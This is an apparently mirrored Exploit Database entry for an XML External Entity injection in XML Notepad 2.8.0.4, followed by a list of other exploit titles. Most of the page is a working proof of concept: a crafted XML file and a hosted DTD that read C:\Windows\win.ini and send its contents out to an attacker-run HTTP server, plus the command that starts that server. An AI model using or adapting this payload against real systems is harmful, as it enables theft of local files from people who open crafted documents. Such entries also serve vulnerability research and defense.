XML Notepad 2.8.0.4 – XML External Entity Injection

Exploit Database
85 阅读

作者： daejinoh

日期： 2019-11-11
类别：
- local
平台：
- xml
来源：https://www.exploit-db.com/exploits/47606/

# Exploit Title: XML Notepad 2.8.0.4 - XML External Entity Injection
# Date: 2019-11-11
# Exploit Author: 8-Team / daejinoh
# Vendor Homepage:https://www.microsoft.com/
# Software Link:https://github.com/microsoft/XmlNotepad
# Version: XML Notepad 2.8.0.4
# Tested on: Windows 10 Pro
# CVE : N/A

# Step
1) File -> Open -> *.xml

# Exploit Code

1) Server(python 3.7) : python -m http.server
2) Poc.xml : 
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

3) payload.dtd
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;

--------------------------------------------------------------------------------

last Exploits
XML Notepad 2.8.0.4 – XML External Entity Injection的更多信息

Ubuntu 14.04/15.10 – User Namespace Overlayfs Xattr SetGID Privilege Escalation：
bVPN 2.5.1 – ‘waselvpnserv’ Unquoted Service Path：
FTPDummy 4.80 – Local Buffer Overflow (SEH)：
Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Privilege Escalation (3)：
BlazeDVD 7.0.2 – Buffer Overflow (SEH)：
Winamp 5.572 – Local Buffer Overflow (EIP + SEH) (DEP Bypass)：
Nodejs – ‘js-yaml load()’ Code Exec (Metasploit)：
VUPlayer 2.49 – ‘.m3u’ File Universal Buffer Overflow (DEP Bypass) (2)：